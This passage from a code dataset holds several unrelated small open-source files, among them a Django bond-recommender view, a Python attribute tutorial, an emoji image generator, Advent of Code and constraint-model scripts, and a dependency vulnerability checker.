'Ticker', 'Country', 'Class - Detail - Code']\n else:\n cohort_attributes = None\n\n ## COLUMNS THAT THE MODEL SHOULD CONSIDER WHEN LOOKING FOR SIMILAR BONDS\n features = [\"OAS\", \"OAD\", \"KRD 5Y\", \"KRD 10Y\", \"KRD 20Y\", \"KRD 30Y\"]\n\n ## COLUMNS TO DISPLAY IN THE CLI OUTPUT\n display_columns = ['ISIN', 'Ticker', 'BCLASS3', 'Country'] + (features or []) + ['Yield to Mat', 'Cpn', 'Px Close']\n #context['display_columns'] = display_columns\n\n bond = get_single_day_data().get_bond(sec_id)\n\n filter_conditions = {'Yield to Mat': (ytm_lower, ytm_upper), 'OAD': (oad_lower, oad_upper)}\n\n bond = bond.reset_index()\n bond_table = bond[display_columns]\n context['bond_table'] = bond_table.values.tolist()\n\n model_helper = get_bpr_model_helper()\n\n similar_bonds = model_helper.predict(sec_id)\n similar_bonds = model_helper.display(similar_bonds, display_cols=display_columns).reset_index()\n similar_bonds_table = similar_bonds.values.tolist()\n\n bond = get_multi_day_data(numdays=numofdays).get_bond(sec_id)\n context['bond_dates'] = '|'.join(bond[\"date\"].values)\n context['bond_OAS'] = '|'.join(list(map(str, bond[\"OAS\"].values)))\n\n bond_dates2 = list()\n bond_OAS2 = list()\n\n for l in similar_bonds_table:\n sec_code = str(l[1])\n bond = get_multi_day_data(numdays=numofdays).get_bond(sec_code)\n bond_dates2.append([sec_code, '|'.join(bond[\"date\"].values)])\n bond_OAS2.append([sec_code, '|'.join(list(map(str, bond[\"OAS\"].values)))])\n\n context['bond_dates2'] = bond_dates2\n context['bond_OAS2'] = bond_OAS2\n\n # Integration with JPM rich/cheap\n isins = similar_bonds.ISIN.unique()\n prediction_result = pd.concat([predict_single_rc(date=None, isin=isin) for isin in isins])\n result = similar_bonds.merge(prediction_result, on=\"ISIN\", how =\"outer\")\n display_columns = display_columns + [\"rich/cheap\"]\n result_table = result[display_columns].values.tolist()\n context[\"similar_bonds_table\"] = result_table\n context['display_columns'] = display_columns\n\n return render(request, 'results.html', context)\n\n except KeyError as e:\n import traceback\n print(traceback.print_exc())\n context['sec_id_error'] = 1\n return render(request, 'home.html', context)\n\n\ndef feedback(request):\n \"\"\"\n Update the model with feedback from the user, and refresh the predictions\n :param request: The RequestContext, expected to have three attributes of the GET request\n bond: The ISIN of the bond we are finding bonds similar to\n better: The ISIN of a bond that is a better recommendation than its current rank\n worse: The ISIN of a bond that is a worse recommendation than its current rank\n \"\"\"\n\n bond = request.GET['bond']\n better = request.GET['better']\n worse = request.GET['worse']\n\n feedback = [(bond, better, worse)]\n get_bpr_model_helper().process_feedback(feedback)\n # TODO add support for persisting the feedback and/or the model\n # model_helper.save('models/bpr_v3.pt')\n\n base_url = reverse('results')\n query_string = urlencode({'sec_id': bond})\n url = \"{}?{}\".format(base_url, query_string)\n\n return redirect(url)\n\n\ndef get_similar_bonds(isin, single_day_data, num_of_bonds, filter_conditions, features=None, cohort_attributes=None):\n \"\"\"\n This is a top-level function that is meant to be called when processing a server requst for SimilarBonds\n\n :param isin: The ISIN identifier of the bond we're trying to find similar bonds for\n :param features: Optional. A list of columns to consider when determining bond similarity.\n Default: None, meaning all columns in the data set\n :param cohort_attributes: Optional. A list of columns specifying the bond attributes that *must* be the same in order for a bond to be considered similar\n Default: None, meaning all bonds are valid candidates\n \"\"\"\n\n # ISIN to Pandas Series of data for that bond\n bond = get_single_day_data().get_bond(isin)\n\n # Pandas Series to Pandas DataFrame of data for all bonds in the specified cohort\n if cohort_attributes is None:\n cohort_attributes = []\n bond_cohort = get_single_day_data().data\n else:\n bond_cohort = get_single_day_data().get_cohort(bond, attributes=cohort_attributes)\n\n ytm_lower = filter_conditions['Yield to Mat'][0]\n ytm_upper = filter_conditions['Yield to Mat'][1]\n oad_lower = filter_conditions['OAD'][0]\n oad_upper = filter_conditions['OAD'][1]\n\n # Filter by ytm range\n if (ytm_upper != '') and (ytm_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'].between(float(ytm_lower), float(ytm_upper), inclusive=True)]\n elif (ytm_upper != '') and (ytm_lower == ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] < float(ytm_upper)]\n elif (ytm_upper == '') and (ytm_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] > float(ytm_lower)]\n else:\n pass\n\n # Filter by oad range\n if (oad_upper != '') and (oad_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['OAD'].between(float(oad_lower), float(oad_upper), inclusive=True)]\n elif (oad_upper != '') and (oad_lower == ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] < float(oad_upper)]\n elif (oad_upper == '') and (oad_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] > float(oad_lower)]\n else:\n pass\n\n if features is None:\n features = [col for col in bond_cohort.columns if col not in cohort_attributes]\n\n # Fit the model\n model = similar_bonds_pipeline()\n model.fit(bond_cohort[features])\n\n # Find similar bonds\n k_neighbors = min(bond_cohort.shape[0], num_of_bonds)\n distances, indices = model.predict(bond[features], k_neighbors=k_neighbors)\n similar_bond_isins = bond_cohort.iloc[indices.ravel()].index.values\n # Exclude the input isin from the list of similar bonds\n similar_bond_isins = [i for i in similar_bond_isins if i != isin]\n\n similar_bonds = get_single_day_data().get_bonds(similar_bond_isins)\n\n return similar_bonds\n","repo_name":"naotominakawa/Capstone","sub_path":"UI/BondRecommender/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8382986758","text":"\"\"\"\n============================\nAuthor:柠檬班-木森\nTime:2020/7/25 11:08\nE-mail:3247119728@qq.com\nCompany:湖南零檬信息技术有限公司\n============================\n\"\"\"\n\"\"\"\n# 动态设置属性\nsetattr(obj,属性名,属性值):在代码执行的过程中给 类/对象 设置属性(属性不存在就是添加,存在就是修改)\n\ngetattr(obj,属性名,默认值):在代码执行的过程中获取 类/对象 属性\n\ndelattr(obj,属性名) :在代码执行的过程中删除 类/对象 属性\n\n\n__dict__:获取所有的属性\n\"\"\"\n\n\nclass BaseClass(object):\n\n def __init__(self, name, sex, age):\n self.name = name\n self.sex = sex\n self.age = age\n\n\n# 动态设置类属性\n# BaseClass.attr = 18\n# BaseClass.attr2 = \"木森\"\n# setattr(BaseClass,\"attr\",18)\n\n# 如何将变量的值设置为类属性名?\n# var = input(\"请输入属性名:\")\n# value = 8890\n# setattr(BaseClass,var,value)\n# 可以查看所有的属性\n# print(BaseClass.__dict__)\n# b1 = BaseClass(\"木木\", \"男\")\n# ------------------设置属性----------------\n# # 给对象设置属性\n# setattr(b1, \"age\", 999)\n# print(b1.__dict__)\n\n# ------------------访问属性----------------\n# b1 = BaseClass(\"木木\", \"男\")\n# # 需求:根据用户的输入的属性名,获取对应的属性值\n# item = input(\"请输入属性名:\")\n# res = getattr(b1, item,None)\n# print(res)\n\n# ——-------------属性删除-----------\nb1 = BaseClass(\"木木\", \"男\",18)\n# 需求:根据用户的输入的属性名,删除对应的属性值\nitem = input(\"请输入属性名:\")\ndelattr(b1, item)\nprint(b1.__dict__)\n\n\n# b1 = BaseClass(\"木木\", \"男\", 18)\n# b1.aa = 11\n# b1.bb = 99\n# print(b1.__dict__)\n\n\n# # 需求:打印name之外的所有属性\n# keys = b1.__dict__.keys()\n# for key in keys:\n# if key != \"name\":\n# print(getattr(b1, key))\n#\n# print(b1.__dict__)\n","repo_name":"guoyunfei0603/py31","sub_path":"day12继承/day12_teacher/demo7_属性动态设置.py","file_name":"demo7_属性动态设置.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72310393913","text":"import os\nimport json\nfrom tqdm import tqdm\n\ndef make_emoji(file_name: str, text: str):\n os.system(\n \"convert -pointsize 140\" +\n \" -font /usr/share/fonts/TTF/mplus-1c-black.ttf\" +\n \" -annotate 0 \" + str(text) +\n \" -gravity center -fill black -size 128x128 xc:none\" +\n \" out/\" + str(file_name) + \".png\"\n )\n\nif __name__ == '__main__':\n os.system(\"mkdir out\")\n with open(\"json/alpha.json\", \"r\") as file:\n alpha_list = json.load(file)\n for char in tqdm(alpha_list):\n make_emoji('zzz_'+char, char)\n\n with open(\"json/hiragana.json\", \"r\") as file:\n kana_list = json.load(file)\n for char in tqdm(kana_list):\n make_emoji(char, char)\n\n with open(\"json/jis1.json\", \"r\") as file:\n kanji_list = json.load(file)\n for char in tqdm(kanji_list):\n make_emoji(char, char)\n\n with open(\"json/katakana.json\", \"r\") as file:\n katakana_list = json.load(file)\n for char in tqdm(katakana_list):\n make_emoji(char, char)\n\n","repo_name":"eliza0x/emoji_maker","sub_path":"emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33464718922","text":"#!/usr/bin/python3\n#\n# dep-vuln-checker.py - check project dependencies for known vulnerabilities\n#\n\nimport sys\nimport subprocess\nimport os.path\nfrom os import environ\nimport requests_cache\nimport datetime\nimport argparse\nimport redis\nimport LogHandler\nimport NvdRepository\nimport GhsaRepository\nimport InventoryRepository\nfrom CodeDir import CodeDir\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Check project dependencies for known vulnerabilities')\n\n parser.add_argument('-g', dest=\"gh_apikey_file\", type=str,\n help=\"GitHub apikey location (default: /etc/dep-vuln-checker/gh-apikey)\",\n default=\"/etc/dep-vuln-checker/gh-apikey\")\n parser.add_argument('-n', dest=\"nvd_apikey_file\", type=str,\n help=\"NVD apikey location (default: /etc/dep-vuln-checker/nvd-apikey)\",\n default=\"/etc/dep-vuln-checker/nvd-apikey\")\n parser.add_argument('-a', dest=\"applog\", type=str,\n help=\"app log location or \\\"none\\\" (default: /var/log/dep-vuln-checker/app.log)\",\n default=\"/var/log/dep-vuln-checker/app.log\")\n parser.add_argument('-l', dest=\"vulnlog\", type=str,\n help=\"vulnerability log location (default: /var/log/dep-vuln-checker/vulns.log)\",\n default=\"/var/log/dep-vuln-checker/vulns.log\")\n parser.add_argument('-i', dest=\"invpath\", type=str,\n help=\"Inventory database location or \\\"none\\\" (default: /var/lib/dep-vuln-checker/inventory.db)\",\n default=\"/var/lib/dep-vuln-checker/inventory.db\")\n parser.add_argument('-c', dest=\"reqcachetype\", type=str,\n help=\"request cache type. Allowed values: redis, sqlite (no request cache used if omitted)\",\n default=None)\n parser.add_argument('-cp', dest=\"reqcachepath\", type=str,\n help=\"reqest cache database path when using sqlite cache type (default: /var/lib/dep-vuln-checker/reqcache.db\",\n default=\"/var/lib/dep-vuln-checker/reqcache.db\")\n parser.add_argument('-rh', dest=\"redishost\", type=str,\n help=\"redis host for request cache and/or severity cache (default: 127.0.0.1)\",\n default=\"127.0.0.1\")\n parser.add_argument('-rp', dest=\"redisport\", type=int,\n help=\"redis port for request cache and/or severity cache (default: 6379)\",\n default=6379)\n parser.add_argument('-rP', dest=\"redispass\", type=str,\n help=\"redis password for request cache and/or severity cache (no password used if omitted)\",\n default=None)\n parser.add_argument('-r', dest=\"ghsarepopath\", type=str,\n help=\"directory to clone GitHub Advisory Database to\",\n default=\"/var/lib/dep-vuln-checker/ghsa\")\n parser.add_argument(\"-s\", action=\"store_true\",\n help=\"silent mode - no output\")\n parser.add_argument(\"-t\", dest=\"nvd_download_tmpdir\", type=str,\n help=\"temp directory to download NVD JSON files (default: /tmp)\",\n default=\"/tmp\")\n parser.add_argument(\"-I\", action=\"store_true\",\n help=\"initialize local NVD + GHSA cache and exit\")\n parser.add_argument('dirlist', nargs='?' if '-I' in sys.argv else '+',\n help=\"location of newline separated file which contains the project dir paths to check OR a single path if only one project needs to be checked\")\n\n return parser.parse_args()\n\n\ndef check_deps(lh: LogHandler):\n try:\n res = subprocess.run([\"local-php-security-checker\", \"-help\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"local-php-security-checker not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n try:\n res = subprocess.run([\"npm\", \"audit\", \"-h\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"npm audit not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n try:\n res = subprocess.run([\"pnpm\", \"audit\", \"-h\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"pnpm audit not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n try:\n res = subprocess.run([\"yarn\", \"-v\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"yarn not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n\ndef read_repolist(path: str, lh: LogHandler):\n repolist = []\n try:\n with open(path, 'r') as fh:\n repolist = filter(None, fh.read().split('\\n'))\n except Exception as e:\n lh.log_msg(\"Unable to read repolist: \" + str(e), \"ERROR\")\n sys.exit(1)\n return repolist\n\n\ndef read_apikey(envvarname: str, file: str, lh: LogHandler):\n # env takes precedence over file\n apikeyfromenv = environ.get(envvarname)\n if apikeyfromenv is not None:\n return apikeyfromenv\n\n try:\n with open(file, 'r') as fh:\n return fh.read().rstrip('\\n')\n except Exception:\n lh.log_msg(\"Unable to read apikey from \" + file, \"ERROR\")\n sys.exit(1)\n\n\ndef patch_req_cache_redis(redis_host, redis_port):\n redisbackend = requests_cache.backends.RedisCache(host=redis_host, port=redis_port)\n requests_cache.install_cache('globalcache', backend=redisbackend, expire_after=datetime.timedelta(days=7))\n\n\ndef patch_req_cache_sqlite(reqcachepath):\n sqlitebackend = requests_cache.backends.SQLiteCache(db_path=reqcachepath)\n requests_cache.install_cache('globalcache', backend=sqlitebackend, expire_after=datetime.timedelta(days=7))\n\n\ndef main():\n args = parse_args()\n print(args.dirlist)\n\n lh = LogHandler.LogHandler(args.applog, args.s)\n\n redishostfromenv = environ.get('REDIS_HOST')\n redisportfromenv = environ.get('REDIS_PORT')\n redispassfromenv = environ.get('REDIS_PASS')\n redishost = args.redishost if redishostfromenv is None else redishostfromenv\n redisport = args.redisport if redisportfromenv is None else redisportfromenv\n redispass = args.redispass if redispassfromenv is None else redispassfromenv\n try:\n if redispass is not None:\n rediscon = redis.Redis(host=redishost, port=redisport, password=redispass)\n else:\n rediscon = redis.Redis(host=redishost, port=redisport)\n rediscon.ping()\n except Exception as e:\n lh.log_msg(\"Failed to connect to redis at {}:{}: {}\".format(redishost, redisport, str(e)), \"ERROR\")\n sys.exit(1)\n lh.log_msg(\"Connected to redis at {}:{}\".format(redishost, redisport), \"INFO\")\n\n nvdrepo = NvdRepository.NvdRepository(read_apikey(\"NVD_APIKEY\", args.nvd_apikey_file, lh), rediscon, lh)\n ghsarepo = GhsaRepository.GhsaRepository(read_apikey(\"GH_APIKEY\", args.gh_apikey_file, lh), rediscon, lh)\n\n check_deps(lh)\n\n if args.invpath != \"none\":\n inventoryrepo = InventoryRepository.InventoryRepository(args.invpath, lh)\n else:\n inventoryrepo = None\n\n if args.reqcachetype == \"redis\":\n patch_req_cache_redis(args.redishost, args.redisport)\n if args.reqcachetype == \"sqlite\":\n patch_req_cache_sqlite(args.reqcachepath)\n\n if args.I:\n lh.log_msg(\"-I given, creating local databases from scratch\", \"INFO\")\n nvdrepo.first_run()\n ghsarepo.download_ghsa_data(args.ghsarepopath)\n ghsarepo.load_ghsa_data(args.ghsarepopath)\n sys.exit(0)\n\n for i in args.dirlist:\n if os.path.isdir(i):\n directory = CodeDir(i, lh)\n directory.set_checkers(nvdrepo, ghsarepo, inventoryrepo)\n directory.run_checkers()\n directory.write_vulns_json(args.vulnlog)\n elif os.path.isfile(i):\n for j in read_repolist(i, lh):\n directory = CodeDir(j, lh)\n directory.set_checkers(nvdrepo, ghsarepo, inventoryrepo)\n directory.run_checkers()\n directory.write_vulns_json(args.vulnlog)\n else:\n lh.log_msg(\"repolist argument is not a dir or file, skipping {}\".format(i), \"WARN\")\n\n lh.log_msg(\"Done\", \"INFO\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ptrsimon/dep-vuln-checker","sub_path":"src/dep-vuln-checker.py","file_name":"dep-vuln-checker.py","file_ext":"py","file_size_in_byte":8849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41124773606","text":"inFp, outFp = None, None \ninStr = \"\"\n\ninFp = open(\"./test.jpg\", \"rb\")\noutFp = open(\"./testCopied.jpg\", \"wb\")\n\nwhile True :\n inStr = inFp.read(1)\n if not inStr :\n break\n outFp.write(inStr)\n\ninFp.close()\noutFp.close()\nprint(\"image file copied.\")\n","repo_name":"yeolkyu/Python_Network_Programming","sub_path":"08장/binaryCopy.py","file_name":"binaryCopy.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18932782149","text":"from keras.models import load_model\nimport evaluate_data\nimport numpy as np\n\nmodel = load_model('model.h5')\n\neX = evaluate_data.eX\neY = evaluate_data.eY\n\n#学習結果の確認\nret = model.predict_classes(eX)\n\ncollectCount = 0\n# ラベル毎の正解の保存\ncollects = [[0, 0],[0, 0],[0, 0], [0, 0]]\nfor idx, val in enumerate(ret):\n print(\"予測:{0},実際{1},{2}\".format(val, eY[idx], val == eY[idx]))\n collectCount = collectCount + (1 if val == eY[idx] else 0)\n collects[eY[idx]][0] = collects[eY[idx]][0] + 1\n if val == eY[idx]:\n collects[eY[idx]][1] = collects[eY[idx]][1] + 1\n \n\n\nprint(\"正解率{0}% (検証日数 {1}日)\".format(collectCount/len(ret)*100, len(ret)))\nprint(\"雨の正解率 = {0}%\\n晴れの正解率 = {1}%\\n曇の正解率 = {2}%\\n雪の正解率 = {3}%\".format(\n collects[0][1] / collects[0][0] * 100 if collects[0][0] > 0 else 0,\n collects[1][1] / collects[1][0] * 100 if collects[1][0] > 0 else 0,\n collects[2][1] / collects[2][0] * 100 if collects[2][0] > 0 else 0,\n collects[3][1] / collects[3][0] * 100 if collects[3][0] > 0 else 0\n))\n","repo_name":"Synashida/keras_first","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42693616706","text":"import sys\nfrom sys import stdin\nN, mod = 10**6,10**9+7\nc = [0]*(N+1)\nc[0] = c[1] = 1\nfor i in range(4,N+1,2):\n\tc[i] = 1\nfor i in range(3,N+1,2):\n\tif c[i]==0:\n\t\tfor j in range(i*i,N+1,2*i):\n\t\t\tc[j] = 1\ndel N\ndef pw(x,y):\n\tres = 1\n\twhile y!=0:\n\t\tif y%2==1:\n\t\t\tres = (res*x)%mod\n\t\ty//=2\n\t\tx = (x*x)%mod\n\treturn res\ndef mu(x,n):\n\tdem,i = 0,x\n\twhile i<=n:\n\t\tdem+=n//i\n\t\ti*=x\n\treturn dem\nfor _ in range(int(stdin.readline())):\n\ta,b = map(int,stdin.readline().split())\n\tans = 1\n\tdem = 0\n\tfor i in range(2,b//2+1):\n\t\tif c[i]==0:\n\t\t\tans = (ans*((mu(i,b)-mu(i,a-1))*2+1))%mod\n\tfor i in range(b//2+1,b+1):\n\t\tif c[i]==0:\n\t\t\tdem+=1\n\tans = (ans*pw(3,dem))%mod\n\tprint(ans)","repo_name":"Hiepnt03/Python_codePtit","sub_path":"PY02060.py","file_name":"PY02060.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5594123934","text":"\"\"\"\nCombinatorial auction in cpmpy.\n\nThis is a more general model for the combinatorial example\nfrom the Numberjack Tutorial, pages 9 and 24 (slides 19/175 and 51/175).\n\nThe original and more talkative model is combinatorial_auction.py\n\nModel created by Hakan Kjellerstrand, hakank@hakank.com\nSee also my cpmpy page: http://www.hakank.org/cpmpy/\n\n\"\"\"\nfrom cpmpy import *\nfrom cpmpy.solvers import *\nimport numpy as np\nfrom instances.cpmpy_hakank import *\nfrom collections import defaultdict\n\n\ndef combinatorial_auction():\n\n n = 5 # number of bids\n bid_amount = [10,20,30,40,14]\n # the items for each bid\n items = [\n [0,1], # A,B\n [0,2], # A, C\n [1,3], # B,D\n [1,2,3], # B,C,D\n [0] # A\n ]\n \n x = intvar(0,1,shape=n, name=\"x\")\n\n # collect the bids for each item\n items_t = defaultdict(list)\n [items_t[j].append(i) for i in range(n) for j in items[i] ]\n \n\n obj = intvar(0,100,name='obj') \n model = Model([\n obj == sum(x*bid_amount),\n [ [sum( [x[bid] for bid in items_t[item]] ) <= 1] for item in items_t]\n ],\n maximize=obj,\n )\n\n return model\n\ndef get_model(seed=0):\n return combinatorial_auction()\n\n","repo_name":"JoD/explain-benchmarks","sub_path":"hakank/instances/combinatorial_auction2.py","file_name":"combinatorial_auction2.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"917518530","text":"import argparse\nimport numpy as np\n \ndef receive_input():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--input\", help=\"path for input file\", type=str, required=True)\n\targs = parser.parse_args()\n\treturn args\n\ndef read_file(args):\n\tfile = open(args.input, 'r')\n\treturn file.readlines()\n\ndef process_file(file):\n\tintersections = {}\n\tcarts = find_carts(file)\n\n\twhile(True):\n\t\tv = is_intersecting(carts)\n\t\tif(v != False):\n\t\t\treturn v[::-1]\n\t\tmove_carts(file, carts)\n\ndef is_intersecting(carts):\n\tfor i in range(len(carts)):\n\t\tfor j in range(i+1, len(carts)):\n\t\t\tpos1 = carts[i][0:2]\n\t\t\tpos2 = carts[j][0:2]\n\t\t\tif(pos1 == pos2):\n\t\t\t\treturn pos1\n\treturn False\n\ndef find_carts(field):\n\t# y,x,orientation,rotate\n\tcarts = []\n\tsymbols = {'>': 1, '<': -1, '^': 1j, 'v': -1j}\n\tfor y in range(len(field)):\n\t\tfor x in range(len(field[0])):\n\t\t\telem = field[y][x]\n\t\t\tif(elem in symbols.keys()):\n\t\t\t\tcarts.append([y, x, symbols[elem], 0])\n\treturn carts\n\ndef move_carts(field, carts):\n\tfor c in carts:\n\n\t\torient = c[2]\n\t\tif(orient == -1):\n\t\t\tc[1] -= 1\n\t\telif(orient == 1):\n\t\t\tc[1] += 1\n\t\telif(orient == 1j):\n\t\t\tc[0] -= 1\n\t\telif(orient == -1j):\n\t\t\tc[0] += 1\n\n\t\tpos = field[c[0]][c[1]]\n\t\tif(pos == '\\\\'):\n\t\t\tif(c[2].real == 0):\n\t\t\t\tc[2] *= 1j\n\t\t\telse:\n\t\t\t\tc[2] *= -1j\n\t\t\t\n\t\telif(pos == '/'):\n\t\t\tif(c[2].real == 0):\n\t\t\t\tc[2] *= -1j\n\t\t\telse:\n\t\t\t\tc[2] *= 1j\n\t\telif(pos == '+'):\n\t\t\tc[2] = c[2] * ((1j) * (-1j) ** c[3])\n\t\t\tc[3] = (c[3] + 1) % 3\n\t\t\n\t\t\ndef main():\n\targs = receive_input()\n\tfile = read_file(args)\n\tprint(process_file(file))\nmain()","repo_name":"j-godinho/advent-of-code-2018","sub_path":"13/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15368962487","text":"\"\"\"\n\n\"\"\"\n\n# PyQt Imports\nfrom PyQt5.Qt import (QStandardItemModel, QStandardItem)\n\n# Figshare Desktop Imports\nfrom Figshare_desktop.custom_widgets.extended_combo import ExtendedCombo\n\n__author__ = \"Tobias Gill\"\n__credits__ = [\"Tobias Gill\", \"Adrian-Tudor Panescu\", \"Miriam Keshani\"]\n__license__ = \"\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Tobias Gill\"\n__email__ = \"toby.gill.09@ucl.ac.uk\"\n__status__ = \"Development\"\n\n\nclass CategoriesCombo(ExtendedCombo):\n \"\"\"\n A QComboBox widget specifically designed to work with Figshare categories.\n \"\"\"\n\n def __init__(self, id_dict: dict, name_dict: dict, parent=None):\n \"\"\"\n Supers QComboBox, but also creates class references to the categories dictionaries.\n\n Args:\n id_dict: Categories dictionary with id numbers as keys.\n name_dict: Categories dictionary with names as keys.\n parent: Widget parent.\n \"\"\"\n super().__init__()\n self.id_dict = id_dict\n self.name_dict = name_dict\n cat_list = sorted(list(self.name_dict.keys()))\n self.fill_combo(cat_list)\n\n model = QStandardItemModel()\n for i, word in enumerate(cat_list):\n item = QStandardItem(word)\n model.setItem(i, 0, item)\n\n self.setModel(model)\n self.setModelColumn(0)\n\n if parent is not None:\n self.setParent(parent)\n\n def fill_combo(self, fill_list: list):\n \"\"\"\n Fills the combo box with categories from the fill list.\n\n Args:\n fill_list: list of strings to put as items in the combo box.\n\n Returns:\n\n \"\"\"\n self.clear()\n self.addItem('')\n self.addItems(fill_list)\n\n","repo_name":"tobias-gill/Figshare_desktop","sub_path":"custom_widgets/categories_combo.py","file_name":"categories_combo.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14066378331","text":"import sys\r\n\r\nBUFFER_LENGTH = 12\r\n\r\ndef get_user_numbers(message):\r\n valid = False\r\n converted_number = 0\r\n while not valid:\r\n input_text = input(message)\r\n \r\n try:\r\n converted_number = int(input_text)\r\n if converted_number > sys.maxsize or converted_number < -sys.maxsize:\r\n print(\"Number too big bozo\")\r\n else:\r\n valid = True\r\n except ValueError:\r\n print(\"Enter an actual number bozo\")\r\n\r\n return converted_number\r\n\r\ndef insert_numbers(array_of_nums, total_inputs):\r\n how_many_more = total_inputs\r\n for a in range(total_inputs):\r\n print(f\"Enter a number for index {a} ({how_many_more} positions left)\")\r\n array_of_nums[a] = get_user_numbers(\"Enter the number for the index\\n-> \")\r\n print()\r\n\r\ndef is_sorted(array):\r\n return True\r\n\r\nif __name__ == \"__main__\":\r\n num_ints = 0\r\n while num_ints <= 0:\r\n num_ints = get_user_numbers(\"How many integers do you want\\n-> \")\r\n if num_ints <= 0:\r\n print(\"Number has to be greater than zero bozo\")\r\n\r\n print(num_ints)\r\n\r\n needs_to_be_sorted = [0] * num_ints\r\n insert_numbers(needs_to_be_sorted, num_ints)\r\n\r\n for p in range(num_ints):\r\n print(f\"index {p} is {needs_to_be_sorted[p]}\")\r\n\r\n if is_sorted(needs_to_be_sorted):\r\n print(\"This is sorted\")\r\n else:\r\n print(\"Still sorted he he\")\r\n","repo_name":"phishfish/Gaslight-Sort","sub_path":"Python/Gaslight-Sort.py","file_name":"Gaslight-Sort.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"8544375923","text":"#!/usr/local/bin/python3\nimport sys\n\nif sys.argv[1] == \"--size\":\n size = int(sys.argv[2])\nelse:\n try:\n size=int(input('Square size:'))\n except ValueError:\n print (\"Not a number\")\n\ndef max_base10_size(max_n):\n return len(str(max_n))\n\nsquared_size = size*size\n\ndef print_list(list):\n print_string = \"\"\n for i in list:\n print_string += ' ' + str(i).rjust(max_base10_size(squared_size), '0')\n if i%size == 0:\n print_string += \"\\n\"\n return print(print_string)\n\ndef print_array(arr):\n length = max_base10_size(squared_size)\n for line in arr:\n print_string = \"\"\n for item in line:\n print_string += \" \"\n if item is None:\n print_string += \"-\" * length\n else:\n print_string += str(item).rjust(max_base10_size(squared_size), '0')\n print(print_string)\n\n\ndef inline(size):\n inline_list = [x+1 for x in range(squared_size)]\n print_list(inline_list)\n\ndef vertical(size):\n numbers = [[None for i in range(size)] for j in range(size)]\n current = 1\n for i in range(size):\n for j in range(size):\n numbers[j][i] = current\n current+=1\n print_array(numbers)\n\n\n\ndef spiral(size):\n numbers = [[None for i in range(size)] for j in range(size)]\n current = squared_size\n i = 0\n j = size-1\n di = 0\n dj = -1\n\n while(current >1):\n while (True):\n #while ( i >= 0 and i < size and j>= 0 and j= 0 and newi < size and newj>= 0 and newj < size and numbers[newi][newj] is None:\n i = newi\n j = newj\n current -= 1\n else:\n break\n\n di,dj = turn(di, dj)\n print_array(numbers)\n\ndef turn(di, dj):\n if di==0 and dj==-1:\n dj = 0\n di = 1\n elif di == 1 and dj == 0:\n di = 0\n dj = 1\n elif di == 0 and dj == 1:\n di = -1\n dj = 0\n else:\n di = 0\n dj = -1\n return di, dj\ninline(size)\nvertical(size)\nprint()\nspiral(size)\n","repo_name":"epfl-dojo/kata-squareNumbers","sub_path":"squareNumbers.py","file_name":"squareNumbers.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"21733045191","text":"x = 1\nprint(x + 3)\n\ndef say_hello_to(name):\n\tprint(\"Hello \" + name)\n\nsay_hello_to(\"David\")\n\nif x < 2:\n\tprint(\"Si, \" + str(x) + \" es menor que 2\")\nelif x == 2:\n\tprint(\"x es igual a 2\")\nelse:\n\tprint(\"La comparacion no es cierta\")\n\n\"\"\"\nedad = input(\"Introduce tu edad: \")\nprint(int(edad))\n\nedadInt = int(edad)\nif edadInt < 18:\n\tprint(\"Eres menor de edad\")\nelif edadInt == 18:\n\tprint(\"Tienes 